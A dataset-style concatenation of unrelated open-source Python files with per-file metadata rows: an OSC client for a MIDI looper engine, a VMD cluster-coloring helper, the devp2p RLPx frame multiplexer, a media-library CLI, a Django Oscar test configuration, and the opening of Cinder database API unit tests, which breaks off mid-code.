"/shutdown", "ss", self._shutdown_callback )
self._server_thread.start()
print( "GUI OSC Server at {0}".format( self._server_thread.get_url() ) )
self._received_pingack = False
self._pingack_lock = threading.Lock()
self._engine_address = liblo.Address( engine_host, engine_port )
liblo.send(
self._engine_address, "/ping", self._server_thread.get_url(), "/pingack" )
# Wait for the pingack.
time.sleep( 0.7 )
self._pingack_lock.acquire()
received = self._received_pingack
self._pingack_lock.release()
if not received:
if fail_on_not_found:
# TODO: something a little friendlier
raise EngineManager.NoEngineError
subprocess.Popen( ["jack_midi_looper", "-p", str( engine_port )] )
self._engine_address = liblo.Address( "localhost", engine_port )
time.sleep( 0.3 ) # Maybe a bit hacky...
liblo.send( self._engine_address, "/ping", self._server_thread.get_url(),
"/pingack" )
time.sleep( 0.7 )
            self._pingack_lock.acquire()
            received = self._received_pingack
            self._pingack_lock.release()
            if not received:
                raise EngineManager.NoEngineError
class NoEngineError( Exception ):
pass
def initialize_subscribers( self ):
"""
Requests that the engine send us update information necessary to bring us up
to its current state.
"""
liblo.send( self._engine_address, "/loop_list",
self._server_thread.get_url(), "/loop/update" )
liblo.send( self._engine_address, "/midi_binding_list",
self._server_thread.get_url(), "/mapping/update" )
liblo.send( self._engine_address, "/register_auto_update", "loops",
self._server_thread.get_url(), "/loop/update" )
liblo.send( self._engine_address, "/register_auto_update", "mappings",
self._server_thread.get_url(), "/mapping/update" )
liblo.send( self._engine_address, "/register_auto_update", "shutdown",
self._server_thread.get_url(), "/shutdown" )
def cleanup( self ):
"""
Conclude interaction with the engine by unsubscribing and potentially
quitting.
"""
if self._quit_on_shutdown:
liblo.send( self._engine_address, "/quit" )
else:
liblo.send( self._engine_address, "/unregister_auto_update", "loops",
self._server_thread.get_url(), "/loop/update" )
liblo.send( self._engine_address, "/unregister_auto_update", "mappings",
self._server_thread.get_url(), "/mapping/update" )
def _pingack_callback( self, path, args ):
host_url, version, loopcount = args
print( "Received pingack from engine on host {0} running version {1}."
.format( host_url, version ) )
print( "The engine currently has {0} loops.".format( loopcount ) )
self._pingack_lock.acquire()
self._received_pingack = True
self._pingack_lock.release()
def _shutdown_callback( self, path, args ):
self.notify( "shutdown", args )
def _loop_change_callback( self, path, args ):
logging.info( "loop change callback" )
for arg in args:
logging.info( " %s", arg )
self.notify( "loops", args )
type_serializations = {
"Note On":"on",
"Note Off":"off",
"CC On":"cc_on",
"CC Off":"cc_off"
}
type_deserializations = {
"on":"Note On",
"off":"Note Off",
"cc_on":"CC On",
"cc_off":"CC Off"
}
action_serializations = {
"Toggle Playback":"toggle_playback",
"Toggle Recording":"toggle_recording"
}
action_deserializations = {
"toggle_playback":"Toggle Playback",
"toggle_recording":"Toggle Recording"
}
@staticmethod
def _serialize_mapping( mapping_info ):
return "{0} {1} {2} {3} {4}".format( mapping_info.channel,
EngineManager.type_serializations[mapping_info.midi_type], mapping_info.value,
EngineManager.action_serializations[mapping_info.loop_action], mapping_info.loop_name )
@staticmethod
def _deserialize_mapping( mapping_serialization ):
data = mapping_serialization.split( " " )
channel = int( data[0] )
midi_type = EngineManager.type_deserializations[data[1]]
value = int( data[2] )
loop_action = EngineManager.action_deserializations[data[3]]
loop_name = data[4]
return MIDIMappingInfo( channel, midi_type, value, loop_name, loop_action )
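    # Wire-format sketch (hypothetical mapping): a MIDIMappingInfo such as
    # MIDIMappingInfo(1, "Note On", 60, "my_loop", "Toggle Playback")
    # serializes to "1 on 60 toggle_playback my_loop", and
    # _deserialize_mapping() inverts _serialize_mapping(). Note that loop
    # names containing spaces would not survive this round trip.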
def _mapping_change_callback( self, path, args ):
logging.info( "mapping change callback" )
for arg in args:
logging.info( " %s", arg )
change, serialization = args
deserialized = ( change, self._deserialize_mapping( serialization ) )
self.notify( "mappings", deserialized )
def new_loop( self, name ):
liblo.send( self._engine_address, "/loop_add", name )
def remove_loops( self, names ):
for name in names:
liblo.send( self._engine_address, "/loop_del", name )
def new_mapping( self, mapping_info ):
serialization = self._serialize_mapping( mapping_info )
liblo.send( self._engine_address, "/add_midi_binding", serialization )
def remove_mappings( self, mapping_infos ):
for info in mapping_infos:
serialization = self._serialize_mapping( info )
liblo.send( self._engine_address, "/remove_midi_binding", serialization )
| gpl-2.0 | -1,342,625,881,783,382,500 | 35.748322 | 99 | 0.601863 | false |
ramansbach/cluster_analysis | clustering/visualize.py | 1 | 2797 | from __future__ import absolute_import, division, print_function
import numpy as np
import gsd.hoomd
import sklearn
import scipy.optimize as opt
import os
import pdb
from sklearn.neighbors import BallTree
from sklearn.neighbors import radius_neighbors_graph
from scipy.spatial.distance import cdist
from scipy.special import erf
from scipy.sparse.csgraph import connected_components
#from .due import due, Doi
from .smoluchowski import massAvSize
#from mpi4py import MPI
from cdistances import conOptDistanceCython,alignDistancesCython
__all__ = ['writeFrameForVMD','writeFramesFromCIDFile']
def writeFrameForVMD(clusterIDs,molno,atomno,frameout):
""" Function that writes out a single frame for coloring by cluster
Parameters
----------
    clusterIDs: list of int
        cluster index of each molecule in the frame
molno: int
number of molecules in frame
atomno: int
number of atoms per molecule
frameout: string
name of output file
Notes
-----
    The output file has one line per cluster, each consisting of a set
    of ints. The first int is the colorID, and the rest are the atom
    indices that should be set to that color. It is assumed that 16
    different colors are available.
    The first line of the file contains the total number of subsequent lines
(# of clusters)
"""
framefile = open(frameout,'w')
ind = 0
framefile.write('{0}\n'.format(max(clusterIDs)+1))
for cID in range(max(clusterIDs)+1):
#pdb.set_trace()
line = ''
colorID = ind % 16
line += str(colorID) + ' '
molinds = np.where(cID == np.array(clusterIDs))[0]
ainds = molinds.copy()
for molind in molinds:
ainds = np.concatenate((ainds,
molno+molind*(atomno-1)+np.arange(0,
atomno-1)))
for aind in ainds:
line += str(aind) + ' '
line += '\n'
framefile.write(line)
ind += 1
framefile.close()
def writeFramesFromCIDFile(cIDfile,molno,atomno,frameoutbase):
""" Function that writes out multiple frames for coloring by cluster
Parameters
----------
cIDfile: file containing cluster IDs
molno: int
number of molecules in frame
atomno: int
number of atoms per molecule
frameoutbase: string
base name of output files
"""
cIDfile = open(cIDfile)
lines = cIDfile.readlines()
cIDfile.close()
ind = 0
for line in lines:
cIDsf = [float(c) for c in line.split()]
cIDs = [int(c) for c in cIDsf]
writeFrameForVMD(cIDs,molno,atomno,frameoutbase+str(ind)+'.dat')
ind+=1
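
# Example usage (file and base names are placeholders): for a system of
# 100 molecules of 17 beads each, write one colored frame per line of a
# cluster-ID file as frame0.dat, frame1.dat, ...
#   writeFramesFromCIDFile('clusterIDs.dat', molno=100, atomno=17,
#                          frameoutbase='frame')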
| mit | -3,627,616,678,007,215,000 | 30.784091 | 78 | 0.632463 | false |
ethereum/pydevp2p | devp2p/multiplexer.py | 1 | 21218 | from gevent.queue import Queue
from collections import OrderedDict
import rlp
from rlp.utils import str_to_bytes, is_integer
import struct
import sys
sys.setrecursionlimit(10000) # frames are generated recursively
# chunked-0: rlp.list(protocol-type, sequence-id, total-packet-size)
header_data_sedes = rlp.sedes.List([rlp.sedes.big_endian_int] * 3, strict=False)
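# 16-byte alignment helpers: frame bodies are zero-padded to the cipher
# block size, e.g. ceil16(33) == 48 and rzpad16(b'abc') appends 13 zero
# bytes.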
def ceil16(x):
return x if x % 16 == 0 else x + 16 - (x % 16)
def rzpad16(data):
if len(data) % 16:
data += b'\x00' * (16 - len(data) % 16)
return data
class MultiplexerError(Exception):
pass
class DeserializationError(MultiplexerError):
pass
class FormatError(MultiplexerError):
pass
class FrameCipherBase(object):
mac_len = 16
header_len = 32
dummy_mac = '\x00' * mac_len
block_size = 16
def encrypt(self, header, frame):
assert len(header) == self.header_len
assert len(frame) % self.block_size == 0
        return header + self.dummy_mac + frame + self.dummy_mac
def decrypt_header(self, data):
assert len(data) >= self.header_len + self.mac_len + 1 + self.mac_len
return data[:self.header_len]
def decrypt_body(self, data, body_size):
assert len(data) >= self.header_len + self.mac_len + body_size + self.mac_len
frame_offset = self.header_len + self.mac_len
return data[frame_offset:frame_offset + body_size]
class Frame(object):
"""
When sending a packet over RLPx, the packet will be framed.
The frame provides information about the size of the packet and the packet's
source protocol. There are three slightly different frames, depending on whether
or not the frame is delivering a multi-frame packet. A multi-frame packet is a
    packet which is split (aka chunked) into multiple frames because its size is
larger than the protocol window size (pws; see Multiplexing). When a packet is
chunked into multiple frames, there is an implicit difference between the first
frame and all subsequent frames.
Thus, the three frame types are
normal, chunked-0 (first frame of a multi-frame packet),
and chunked-n (subsequent frames of a multi-frame packet).
Single-frame packet:
header || header-mac || frame || mac
Multi-frame packet:
header || header-mac || frame-0 ||
[ header || header-mac || frame-n || ... || ]
header || header-mac || frame-last || mac
"""
header_size = 16
mac_size = 16
padding = 16
is_chunked_0 = False
total_payload_size = None # only used with chunked_0
frame_cipher = None
cipher_called = False
def __init__(self, protocol_id, cmd_id, payload, sequence_id, window_size,
is_chunked_n=False, frames=None, frame_cipher=None):
payload = memoryview(payload)
assert is_integer(window_size)
assert window_size % self.padding == 0
assert isinstance(cmd_id, int) and cmd_id < 256
self.cmd_id = cmd_id
self.payload = payload
if frame_cipher:
self.frame_cipher = frame_cipher
self.frames = frames or []
assert protocol_id < 2**16
self.protocol_id = protocol_id
assert sequence_id is None or sequence_id < 2**16
self.sequence_id = sequence_id
self.is_chunked_n = is_chunked_n
self.frames.append(self)
# chunk payloads resulting in frames exceeding window_size
fs = self.frame_size()
if fs > window_size:
if not is_chunked_n:
self.is_chunked_0 = True
self.total_payload_size = self.body_size()
# chunk payload
self.payload = payload[:window_size - fs]
assert self.frame_size() <= window_size
remain = payload[len(self.payload):]
assert len(remain) + len(self.payload) == len(payload)
Frame(protocol_id, cmd_id, remain, sequence_id, window_size,
is_chunked_n=True,
frames=self.frames,
frame_cipher=frame_cipher)
assert self.frame_size() <= window_size
def __repr__(self):
return '<Frame(%s, len=%d sid=%r)>' % \
(self._frame_type(), self.frame_size(), self.sequence_id)
def _frame_type(self):
return 'normal' * self.is_normal or 'chunked_0' * self.is_chunked_0 or 'chunked_n'
def body_size(self, padded=False):
# frame-size: 3-byte integer size of frame, big endian encoded (excludes padding)
# frame relates to body w/o padding w/o mac
l = len(self.enc_cmd_id) + len(self.payload)
if padded:
l = ceil16(l)
return l
def frame_size(self):
# header16 || mac16 || dataN + [padding] || mac16
return self.header_size + self.mac_size + self.body_size(padded=True) + self.mac_size
@property
def is_normal(self):
return not self.is_chunked_n and not self.is_chunked_0
@property
def header(self):
"""
header: frame-size || header-data || padding
frame-size: 3-byte integer size of frame, big endian encoded
header-data:
normal: rlp.list(protocol-type[, sequence-id])
chunked-0: rlp.list(protocol-type, sequence-id, total-packet-size)
chunked-n: rlp.list(protocol-type, sequence-id)
normal, chunked-n: rlp.list(protocol-type[, sequence-id])
values:
protocol-type: < 2**16
sequence-id: < 2**16 (this value is optional for normal frames)
total-packet-size: < 2**32
padding: zero-fill to 16-byte boundary
"""
assert self.protocol_id < 2**16
assert self.sequence_id is None or self.sequence_id < 2**16
l = [self.protocol_id]
if self.is_chunked_0:
assert self.sequence_id is not None
l.append(self.sequence_id)
l.append(self.total_payload_size)
elif self.sequence_id is not None: # normal, chunked_n
l.append(self.sequence_id)
header_data = rlp.encode(l, sedes=header_data_sedes)
assert tuple(l) == rlp.decode(header_data, sedes=header_data_sedes, strict=False)
# write body_size to header
# frame-size: 3-byte integer size of frame, big endian encoded (excludes padding)
# frame relates to body w/o padding w/o mac
body_size = self.body_size()
assert body_size < 256**3
header = struct.pack('>I', body_size)[1:] + header_data
header = rzpad16(header) # padding
assert len(header) == self.header_size
return header
@property
def enc_cmd_id(self):
if not self.is_chunked_n:
return rlp.encode(self.cmd_id, sedes=rlp.sedes.big_endian_int) # unsigned byte
return b''
@property
def body(self):
"""
frame:
normal: rlp(packet-type) [|| rlp(packet-data)] || padding
chunked-0: rlp(packet-type) || rlp(packet-data...)
chunked-n: rlp(...packet-data) || padding
padding: zero-fill to 16-byte boundary (only necessary for last frame)
"""
b = self.enc_cmd_id # packet-type
length = len(b) + len(self.payload)
assert isinstance(self.payload, memoryview)
return b + self.payload.tobytes() + b'\x00' * (ceil16(length) - length)
def get_frames(self):
return self.frames
def as_bytes(self):
assert not self.cipher_called # must only be called once
if not self.frame_cipher:
assert len(self.header) == 16 == self.header_size
assert len(self.body) == self.body_size(padded=True)
dummy_mac = b'\x00' * self.mac_size
r = self.header + dummy_mac + self.body + dummy_mac
assert len(r) == self.frame_size()
return r
else:
self.cipher_called = True
e = self.frame_cipher.encrypt(self.header, self.body)
assert len(e) == self.frame_size()
return e
class Packet(object):
"""
Packets are emitted and received by subprotocols
"""
def __init__(self, protocol_id=0, cmd_id=0, payload=b'', prioritize=False):
self.protocol_id = protocol_id
self.cmd_id = cmd_id
self.payload = payload
self.prioritize = prioritize
def __repr__(self):
return 'Packet(%r)' % dict(protocol_id=self.protocol_id,
cmd_id=self.cmd_id,
payload_len=len(self.payload),
prioritize=self.prioritize)
def __eq__(self, other):
s = dict(self.__dict__)
s.pop('prioritize')
o = dict(other.__dict__)
o.pop('prioritize')
return s == o
def __len__(self):
return len(self.payload)
class Multiplexer(object):
"""
Multiplexing of protocols is performed via dynamic framing and fair queueing.
Dequeuing packets is performed in a cycle which dequeues one or more packets
from the queue(s) of each active protocol. The multiplexor determines the
amount of bytes to send for each protocol prior to each round of dequeuing packets.
If the size of an RLP-encoded packet is less than 1 KB then the protocol may
request that the network layer prioritize the delivery of the packet.
This should be used if and only if the packet must be delivered before all other packets.
The network layer maintains two queues and three buffers per protocol:
a queue for normal packets, a queue for priority packets,
a chunked-frame buffer, a normal-frame buffer, and a priority-frame buffer.
Implemented Variant:
each sub protocol has three queues
prio
normal
chunked
protocols are queried round robin
"""
max_window_size = 8 * 1024
max_priority_frame_size = 1024
max_payload_size = 10 * 1024**2
frame_cipher = None
_cached_decode_header = None
def __init__(self, frame_cipher=None):
if frame_cipher:
# assert isinstance(frame_cipher, FrameCipherBase)
self.frame_cipher = frame_cipher
self.queues = OrderedDict() # protocol_id : dict(normal=queue, chunked=queue, prio=queue)
self.sequence_id = dict() # protocol_id : counter
self.last_protocol = None # last protocol, which sent data to the buffer
self.chunked_buffers = dict() # decode: protocol_id: dict(sequence_id: buffer)
self._decode_buffer = bytearray()
@property
def num_active_protocols(self):
"A protocol is considered active if it's queue contains one or more packets."
return sum(1 for p_id in self.queues if self.is_active_protocol(p_id))
def is_active_protocol(self, protocol_id):
return True if sum(q.qsize() for q in self.queues[protocol_id].values()) else False
def protocol_window_size(self, protocol_id=None):
"""
pws = protocol-window-size = window-size / active-protocol-count
initial pws = 8kb
"""
if protocol_id and not self.is_active_protocol(protocol_id):
s = self.max_window_size // (1 + self.num_active_protocols)
else:
s = self.max_window_size // max(1, self.num_active_protocols)
return s - s % 16 # should be a multiple of padding size
def add_protocol(self, protocol_id):
assert protocol_id not in self.queues
self.queues[protocol_id] = dict(normal=Queue(),
chunked=Queue(),
priority=Queue())
self.sequence_id[protocol_id] = 0
self.chunked_buffers[protocol_id] = dict()
self.last_protocol = protocol_id
@property
def next_protocol(self):
protocols = tuple(self.queues.keys())
if self.last_protocol == protocols[-1]:
next_protocol = protocols[0]
else:
next_protocol = protocols[protocols.index(self.last_protocol) + 1]
self.last_protocol = next_protocol
return next_protocol
def add_packet(self, packet):
#protocol_id, cmd_id, rlp_data, prioritize=False
sid = self.sequence_id[packet.protocol_id]
self.sequence_id[packet.protocol_id] = (sid + 1) % 2**16
frames = Frame(packet.protocol_id, packet.cmd_id, packet.payload,
sequence_id=sid,
window_size=self.protocol_window_size(packet.protocol_id),
frame_cipher=self.frame_cipher
).frames
queues = self.queues[packet.protocol_id]
if packet.prioritize:
assert len(frames) == 1
assert frames[0].frame_size() <= self.max_priority_frame_size
queues['priority'].put(frames[0])
elif len(frames) == 1:
queues['normal'].put(frames[0])
else:
for f in frames:
queues['chunked'].put(f)
def pop_frames_for_protocol(self, protocol_id):
"""
If priority packet and normal packet exist:
send up to pws/2 bytes from each (priority first!)
else if priority packet and chunked-frame exist:
send up to pws/2 bytes from each
else
if normal packet and chunked-frame exist: send up to pws/2 bytes from each
else
read pws bytes from active buffer
If there are bytes leftover -- for example, if the bytes sent is < pws,
then repeat the cycle.
"""
pws = self.protocol_window_size()
queues = self.queues[protocol_id]
frames = []
        size = 0
while size < pws:
frames_added = 0
for qn in ('priority', 'normal', 'chunked'):
q = queues[qn]
if q.qsize():
fs = q.peek().frame_size()
if size + fs <= pws:
frames.append(q.get())
size += fs
frames_added += 1
# add no more than two in order to send normal and priority first
if frames_added == 2:
break # i.e. next is 'priority' again
# empty queues
if frames_added == 0:
break
# the following can not be guaranteed, as pws might have been different
# at the time where packets were framed and added to the queues
# assert sum(f.frame_size() for f in frames) <= pws
return frames
def pop_frames(self):
"""
returns the frames for the next protocol up to protocol window size bytes
"""
protocols = tuple(self.queues.keys())
idx = protocols.index(self.next_protocol)
protocols = protocols[idx:] + protocols[:idx]
assert len(protocols) == len(self.queues.keys())
for p in protocols:
frames = self.pop_frames_for_protocol(p)
if frames:
return frames
return []
def pop_all_frames(self):
frames = []
while True:
r = self.pop_frames()
frames.extend(r)
if not r:
break
return frames
def pop_all_frames_as_bytes(self):
return b''.join(f.as_bytes() for f in self.pop_all_frames())
def decode_header(self, buffer):
assert isinstance(buffer, memoryview)
assert len(buffer) >= 32
if self.frame_cipher:
header = self.frame_cipher.decrypt_header(
buffer[:Frame.header_size + Frame.mac_size].tobytes())
else:
# header: frame-size || header-data || padding
header = buffer[:Frame.header_size].tobytes()
return header
def decode_body(self, buffer, header=None):
"""
w/o encryption
        peek into buffer for body_size
return None if buffer is not long enough to decode frame
"""
assert isinstance(buffer, memoryview)
if len(buffer) < Frame.header_size:
return None, buffer
if not header:
            # decode_header expects the memoryview itself and slices it
            header = self.decode_header(buffer)
body_size = struct.unpack('>I', b'\x00' + header[:3])[0]
if self.frame_cipher:
body = self.frame_cipher.decrypt_body(buffer[Frame.header_size + Frame.mac_size:].tobytes(),
body_size)
assert len(body) == body_size
bytes_read = Frame.header_size + Frame.mac_size + ceil16(len(body)) + Frame.mac_size
else:
# header: frame-size || header-data || padding
header = buffer[:Frame.header_size].tobytes()
# frame-size: 3-byte integer size of frame, big endian encoded (excludes padding)
# frame relates to body w/o padding w/o mac
body_offset = Frame.header_size + Frame.mac_size
body = buffer[body_offset:body_offset + body_size].tobytes()
assert len(body) == body_size
bytes_read = ceil16(body_offset + body_size + Frame.mac_size)
assert bytes_read % Frame.padding == 0
# normal, chunked-n: rlp.list(protocol-type[, sequence-id])
# chunked-0: rlp.list(protocol-type, sequence-id, total-packet-size)
try:
header_data = rlp.decode(header[3:], sedes=header_data_sedes, strict=False)
except rlp.RLPException:
raise DeserializationError('invalid rlp data')
if len(header_data) == 3:
chunked_0 = True
total_payload_size = header_data[2]
assert total_payload_size < 2**32
else:
chunked_0 = False
total_payload_size = None
# protocol-type: < 2**16
protocol_id = header_data[0]
assert protocol_id < 2**16
# sequence-id: < 2**16 (this value is optional for normal frames)
if len(header_data) > 1:
sequence_id = header_data[1]
assert sequence_id < 2**16
else:
sequence_id = None
# build packet
if protocol_id not in self.chunked_buffers:
raise MultiplexerError('unknown protocol_id %d' % (protocol_id))
chunkbuf = self.chunked_buffers[protocol_id]
if sequence_id in chunkbuf:
# body chunked-n: packet-data || padding
packet = chunkbuf[sequence_id]
if chunked_0:
raise MultiplexerError('received chunked_0 frame for existing buffer %d of protocol %d' %
(sequence_id, protocol_id))
if len(body) > packet.total_payload_size - len(packet.payload):
raise MultiplexerError('too much data for chunked buffer %d of protocol %d' %
(sequence_id, protocol_id))
# all good
packet.payload += body
if packet.total_payload_size == len(packet.payload):
del packet.total_payload_size
del chunkbuf[sequence_id]
return packet
else:
# body normal, chunked-0: rlp(packet-type) [|| rlp(packet-data)] || padding
item, end = rlp.codec.consume_item(body, 0)
cmd_id = rlp.sedes.big_endian_int.deserialize(item)
if chunked_0:
payload = bytearray(body[end:])
total_payload_size -= end
else:
payload = body[end:]
packet = Packet(protocol_id=protocol_id, cmd_id=cmd_id, payload=payload)
if chunked_0:
if total_payload_size < len(payload):
raise MultiplexerError('total payload size smaller than initial chunk')
if total_payload_size == len(payload):
return packet # shouldn't have been chunked, whatever
assert sequence_id is not None
packet.total_payload_size = total_payload_size
chunkbuf[sequence_id] = packet
else:
return packet # normal (non-chunked)
def decode(self, data=''):
if data:
self._decode_buffer.extend(data)
if not self._cached_decode_header:
if len(self._decode_buffer) < Frame.header_size + Frame.mac_size:
return []
else:
self._cached_decode_header = self.decode_header(memoryview(self._decode_buffer))
assert isinstance(self._cached_decode_header, bytes)
body_size = struct.unpack('>I', b'\x00' + self._cached_decode_header[:3])[0]
required_len = Frame.header_size + Frame.mac_size + ceil16(body_size) + Frame.mac_size
if len(self._decode_buffer) >= required_len:
packet = self.decode_body(memoryview(self._decode_buffer), self._cached_decode_header)
self._cached_decode_header = None
self._decode_buffer = self._decode_buffer[required_len:]
if packet:
return [packet] + self.decode()
else:
return self.decode()
return []
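

# A minimal unencrypted round-trip sketch (not part of the upstream
# module): it assumes rlp and gevent are importable and exercises only
# the frame_cipher=None path shown above.
if __name__ == '__main__':
    mux = Multiplexer()
    mux.add_protocol(0)
    sent = Packet(protocol_id=0, cmd_id=1, payload=b'hello world')
    mux.add_packet(sent)
    wire_data = mux.pop_all_frames_as_bytes()

    demux = Multiplexer()
    demux.add_protocol(0)
    received = demux.decode(wire_data)
    assert received == [sent], received
    print('round-trip ok: %r' % received[0])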
| mit | -6,756,658,152,461,528,000 | 37.578182 | 105 | 0.582996 | false |
tschaefer/director | director/__init__.py | 1 | 2748 | # -*- coding: utf-8 -*-
import sys
import os
import argparse
from director.importer import Importer
from director.updater import Updater
from director.service import Service
def stype(bytestring):
unicode_string = bytestring.decode(sys.getfilesystemencoding())
return unicode_string
def parse_options():
db = os.path.join(os.path.expanduser('~'), 'director.db')
db = 'sqlite:///%s' % db
parser = argparse.ArgumentParser(description='Director')
parser.add_argument('-d', '--database',
type=unicode,
default=db,
help='database url')
subparsers = parser.add_subparsers()
parser_import = subparsers.add_parser('import')
parser_import.set_defaults(importer=True)
parser_import.add_argument('path',
type=stype,
help='media path')
parser_import.add_argument('-v', '--verbose',
action='store_true',
help='verbose output')
parser_update = subparsers.add_parser('update')
parser_update.set_defaults(updater=True)
parser_update.add_argument('path',
type=stype,
help='media path')
parser_update.add_argument('-v', '--verbose',
action='store_true',
help='verbose output')
parser_service = subparsers.add_parser('service')
parser_service.set_defaults(service=True)
parser_service.add_argument('path',
type=stype,
help='media path')
parser_service.add_argument('-H', '--host',
type=unicode,
default='localhost',
help='bind to address')
parser_service.add_argument('-p', '--port',
type=int,
default=8888,
help='listen to port')
return parser.parse_args()
def run(args):
if hasattr(args, 'importer'):
importer = Importer(path=args.path, database=args.database,
verbose=args.verbose)
importer.run()
elif hasattr(args, 'updater'):
updater = Updater(path=args.path, database=args.database,
verbose=args.verbose)
updater.run()
elif hasattr(args, 'service'):
service = Service(host=args.host, port=args.port,
database=args.database, path=args.path)
service.run()
def main():
args = parse_options()
run(args)
if __name__ == '__main__':
main()
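
# Example invocations (paths and host are placeholders):
#   director import ~/Music -v
#   director update ~/Music
#   director service ~/Music -H 0.0.0.0 -p 8888
# The default database is a SQLite file, director.db, in the user's
# home directory; override it with -d/--database.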
| bsd-3-clause | -2,391,396,943,135,285,000 | 32.108434 | 67 | 0.519651 | false |
elliotthill/django-oscar | tests/config.py | 1 | 3532 | import os
import django
from django.conf import settings, global_settings
import oscar
def configure():
if not settings.configured:
from oscar.defaults import OSCAR_SETTINGS
# Helper function to extract absolute path
location = lambda x: os.path.join(
os.path.dirname(os.path.realpath(__file__)), x)
test_settings = {
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
},
},
'INSTALLED_APPS': [
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.flatpages',
'django.contrib.staticfiles',
'sorl.thumbnail',
'compressor',
# Use a custom partner app to test overriding models. I can't
# find a way of doing this on a per-test basis, so I'm using a
# global change.
] + oscar.get_core_apps(['tests._site.apps.partner']),
'TEMPLATE_CONTEXT_PROCESSORS': (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.contrib.messages.context_processors.messages",
'oscar.apps.search.context_processors.search_form',
'oscar.apps.customer.notifications.context_processors.notifications',
'oscar.apps.promotions.context_processors.promotions',
'oscar.apps.checkout.context_processors.checkout',
'oscar.core.context_processors.metadata',
),
'TEMPLATE_DIRS': (
location('templates'),
oscar.OSCAR_MAIN_TEMPLATE_DIR,
),
'MIDDLEWARE_CLASSES': global_settings.MIDDLEWARE_CLASSES + (
'oscar.apps.basket.middleware.BasketMiddleware',
),
'AUTHENTICATION_BACKENDS': (
'oscar.apps.customer.auth_backends.Emailbackend',
'django.contrib.auth.backends.ModelBackend',
),
'HAYSTACK_CONNECTIONS': {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
}
},
'PASSWORD_HASHERS': ['django.contrib.auth.hashers.MD5PasswordHasher'],
'ROOT_URLCONF': 'tests._site.urls',
'LOGIN_REDIRECT_URL': '/accounts/',
'STATIC_URL': '/static/',
'COMPRESS_ENABLED': False,
'ADMINS': ('[email protected]',),
'DEBUG': False,
'SITE_ID': 1,
'APPEND_SLASH': True,
'DDF_DEFAULT_DATA_FIXTURE': 'tests.dynamic_fixtures.OscarDynamicDataFixtureClass',
'SESSION_SERIALIZER': 'django.contrib.sessions.serializers.PickleSerializer',
}
if django.VERSION >= (1, 5):
test_settings['INSTALLED_APPS'] += ['tests._site.myauth', ]
test_settings['AUTH_USER_MODEL'] = 'myauth.User'
test_settings.update(OSCAR_SETTINGS)
settings.configure(**test_settings)
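
# Typically called once, before any Django models are imported; a test
# runner or conftest might do, for example:
#   from tests.config import configure
#   configure()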
| bsd-3-clause | 6,051,882,844,065,200,000 | 41.047619 | 94 | 0.541336 | false |
rakeshmi/cinder | cinder/tests/unit/test_db_api.py | 1 | 78467 | # Copyright 2014 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for cinder.db.api."""
import datetime
from oslo_config import cfg
from oslo_utils import uuidutils
from cinder import context
from cinder import db
from cinder.db.sqlalchemy import api as sqlalchemy_api
from cinder import exception
from cinder import quota
from cinder import test
CONF = cfg.CONF
def _quota_reserve(context, project_id):
"""Create sample Quota, QuotaUsage and Reservation objects.
There is no method db.quota_usage_create(), so we have to use
db.quota_reserve() for creating QuotaUsage objects.
Returns reservations uuids.
"""
def get_sync(resource, usage):
def sync(elevated, project_id, session):
return {resource: usage}
return sync
quotas = {}
resources = {}
deltas = {}
for i, resource in enumerate(('volumes', 'gigabytes')):
quotas[resource] = db.quota_create(context, project_id,
resource, i + 1)
resources[resource] = quota.ReservableResource(resource,
'_sync_%s' % resource)
deltas[resource] = i + 1
return db.quota_reserve(
context, resources, quotas, deltas,
datetime.datetime.utcnow(), datetime.datetime.utcnow(),
datetime.timedelta(days=1), project_id
)
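
# Typical use inside a test, e.g.:
#   reservations = _quota_reserve(ctxt, 'project1')
# creates 'volumes' and 'gigabytes' quotas and usages for the project
# and returns the reservation uuids for later commit or rollback.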
class ModelsObjectComparatorMixin(object):
def _dict_from_object(self, obj, ignored_keys):
if ignored_keys is None:
ignored_keys = []
return dict([(k, v) for k, v in obj.iteritems()
if k not in ignored_keys])
def _assertEqualObjects(self, obj1, obj2, ignored_keys=None):
obj1 = self._dict_from_object(obj1, ignored_keys)
obj2 = self._dict_from_object(obj2, ignored_keys)
self.assertEqual(
len(obj1), len(obj2),
"Keys mismatch: %s" % str(set(obj1.keys()) ^ set(obj2.keys())))
for key, value in obj1.iteritems():
self.assertEqual(value, obj2[key])
def _assertEqualListsOfObjects(self, objs1, objs2, ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
sort_key = lambda d: [d[k] for k in sorted(d)]
conv_and_sort = lambda obj: sorted(map(obj_to_dict, obj), key=sort_key)
self.assertEqual(conv_and_sort(objs1), conv_and_sort(objs2))
def _assertEqualListsOfPrimitivesAsSets(self, primitives1, primitives2):
self.assertEqual(len(primitives1), len(primitives2))
for primitive in primitives1:
self.assertIn(primitive, primitives2)
for primitive in primitives2:
self.assertIn(primitive, primitives1)
class BaseTest(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(BaseTest, self).setUp()
self.ctxt = context.get_admin_context()
class DBAPIServiceTestCase(BaseTest):
"""Unit tests for cinder.db.api.service_*."""
def _get_base_values(self):
return {
'host': 'fake_host',
'binary': 'fake_binary',
'topic': 'fake_topic',
'report_count': 3,
'disabled': False
}
def _create_service(self, values):
v = self._get_base_values()
v.update(values)
return db.service_create(self.ctxt, v)
def test_service_create(self):
service = self._create_service({})
self.assertFalse(service['id'] is None)
for key, value in self._get_base_values().iteritems():
self.assertEqual(value, service[key])
def test_service_destroy(self):
service1 = self._create_service({})
service2 = self._create_service({'host': 'fake_host2'})
db.service_destroy(self.ctxt, service1['id'])
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, service1['id'])
self._assertEqualObjects(db.service_get(self.ctxt, service2['id']),
service2)
def test_service_update(self):
service = self._create_service({})
new_values = {
'host': 'fake_host1',
